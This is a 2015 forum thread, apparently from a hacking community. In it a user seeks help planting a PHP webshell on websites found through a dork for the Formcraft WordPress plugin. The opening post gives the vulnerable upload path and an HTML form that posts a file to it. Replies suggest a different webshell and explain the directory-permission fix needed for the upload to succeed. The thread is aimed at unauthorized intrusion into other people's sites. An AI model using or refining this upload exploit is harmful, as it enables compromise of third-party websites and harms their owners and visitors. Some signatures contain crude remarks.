Author Topic: My webshell is not up-loadable (0_-) PLZ help  (Read 1060 times)

0 Members and 1 Guest are viewing this topic.

Offline Day_dreamer

  • Serf
  • *
  • Posts: 45
  • Cookies: -20
    • View Profile
My webshell is not up-loadable (0_-) PLZ help
« on: August 24, 2015, 09:19:24 am »
Dork:"powered by Formcraft"



Vuln result: {"failed":"No file found 2"}
Exploit : wp-content/plugins/formcraft/file-upload/server/php/upload.php


this is the script I used and saved as html and run in a browser:
<form method="POST" action="target.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>


I found a vul website, that allowes me to upload a shell form my local file yey (=


I used weeveley in backbox linux to generate one and tried to upload, but it didn't


It said:{"failed":"Not writable"} (I tried changing the permissions by chmod 777 (file)) Nothing worked!

Is there anything wrong with weevely generated shell (php)?

Am I using the wrong type of shell? If yes then how can I determine the ideal web shell for this purpose and where can I find them?

[/size]Thanks in advance ;D

« Last Edit: August 24, 2015, 09:21:56 am by Day_dreamer »
Don't trust anyone.

Offline wendy2

  • NULL
  • Posts: 1
  • Cookies: -1
  • Screwing Crypto now!
    • View Profile
Re: My webshell is not up-loadable (0_-) PLZ help
« Reply #1 on: September 02, 2015, 11:44:54 pm »
Try using some simple shell first. b347k for instance.  :)
Silence = Peace

Offline khofo

  • EZ's Swashbuckler
  • Knight
  • **
  • Posts: 350
  • Cookies: 25
  • My humor is so black, it could go cotton picking.
    • View Profile
Re: My webshell is not up-loadable (0_-) PLZ help
« Reply #2 on: September 03, 2015, 02:33:08 am »
Dude please use [code$] [/code$] for your code (without the $)
Quote from: #Evilzone
<Spacecow18> priests are bad ppl
<Insanity> Holy crap
Of course God isnt dead. He's out there partying with the Easter Bunny, Santa Clause, Tooth Fairy, and the Man on the moon...
Some of my work: Introduction to Physical Security

Offline Day_dreamer

  • Serf
  • *
  • Posts: 45
  • Cookies: -20
    • View Profile
Re: My webshell is not up-loadable (0_-) PLZ help
« Reply #3 on: September 03, 2015, 07:06:00 am »
Try using some simple shell first. b347k for instance.  :)

I see, ok thanks =)
Don't trust anyone.

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: My webshell is not up-loadable (0_-) PLZ help
« Reply #4 on: September 03, 2015, 07:07:55 am »
I see, ok thanks =)

That means edit your damn post and fix it
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline .goethe

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 2
  • /dev/null
    • View Profile
Re: My webshell is not up-loadable (0_-) PLZ help
« Reply #5 on: September 04, 2015, 02:57:34 am »
directory need to be writeable (not the file..)